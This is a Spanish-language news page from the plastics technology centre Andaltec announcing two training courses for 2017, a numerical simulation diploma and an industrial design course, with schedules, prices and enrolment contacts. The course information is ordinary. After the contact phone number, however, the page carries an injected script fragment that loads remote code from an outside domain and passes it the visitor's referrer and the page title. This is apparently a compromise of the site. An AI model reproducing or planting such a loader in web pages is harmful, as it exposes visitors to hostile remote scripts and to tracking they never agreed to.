Andaltec
Copyright Andaltec
Cursos de Andaltec con importantes posibilidades de inserción laboral en el sector del plástico - Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
26873
post-template-default,single,single-post,postid-26873,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.10.0,vc_responsive
 

Cursos de Andaltec con importantes posibilidades de inserción laboral en el sector del plástico

Cursos de Andaltec con importantes posibilidades de inserción laboral en el sector del plástico

El Centro Tecnológico del Plástico (Andaltec) ha abierto el plazo de inscripción para dos actividades formativas, que se impartirán en su sede de Martos (Jaén) a partir del mes de enero. Estos cursos presentan unas importantes perspectivas de inserción laboral, ya que forman a profesionales con un perfil muy demandado por las empresas del sector del plástico.

Diploma de Especialización en Simulación Numérica en Ingeniería e Industria de Inyección de Plásticos

La Universidad de Jaén y el Centro Tecnológico del Plástico (Andaltec) organizan la primera edición del Diploma de Especialización en Simulación Numérica en Ingeniería e Industria de Inyección de Plásticos. Esta actividad, que se desarrollará entre los meses de enero y julio con una duración de 400 horas, ofrece importantes oportunidades laborales a sus alumnos.

La preinscripción está abierta hasta el 23 de diciembre, mientras que el plazo de matrícula se extiende entre el 1 de noviembre y el 23 de diciembre.

Este título de Experto pretende complementar la formación de profesionales técnicos en la industria del plástico o ingenieros en general en el campo de la simulación numérica a través de una formación integral en métodos computacionales, manejo de software y fundamentos de inyección de plásticos. El alumnado recibirá formación en el manejo avanzado de software comercial (ANSYS Fluent, ABAQUS y Moldflow) y de código libre (principalmente OpenFOAM) de elevado interés para la industria del plástico y otros sectores como la automoción, mecánica o el diseño. Las clases se impartirán en horario de jueves y viernes por la tarde y sábados por la mañana para facilitar la asistencia de trabajadores, y habrá disponibles dos becas que cubren el importe total de esta formación.

PLAZOS
Preinscripción: 1/10 – 23/12 (2016) – SOLICITUD DE PREINSCRIPCIÓN
Matrícula: 1/11 – 23/12 (2016)
Comienzo de clases: 12/01 (2017)
Comienzo de prácticas: 01/07 (2017)

Diseño industrial

El curso de Diseño industrial se desarrollará entre los meses de enero y abril, con una duración de 320 horas.

OBJETIVOS: Conocer el funcionamiento de las herramientas de trabajo software utilizadas para el desarrollo de productos en una amplia variedad de sectores como el aeronáutico, automoción, electrónico…

DIRIGIDO A: Ingenieros Técnicos y Superiores, Aparejadores, Delineantes y a cualquier Técnico con interés en Diseño Industrial

FECHAS: Del 23 de enero al 25 de abril de 2017

HORARIO: De lunes a viernes, de 08:30 a 13:30 horas

INSCRIPCIÓN: Enviar un mail a formacion@andaltec.org con los siguientes datos: Nombre completo, teléfono, dirección, email, DNI y CV.

PRECIO: 1280 € (Desempleados y autónomos) 1440 € (Trabajadores)

OBSERVACIONES: Curso bonificable en las cuotas de la Seguridad Social. Gestión integral de la bonificación realizada por Andaltec.

Ficha del curso

 

Más información e inscripción en ambos cursos:
Mónica Ureña (formacion@andaltec.org)
Tlf: 953 555117 (ext. 231)s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;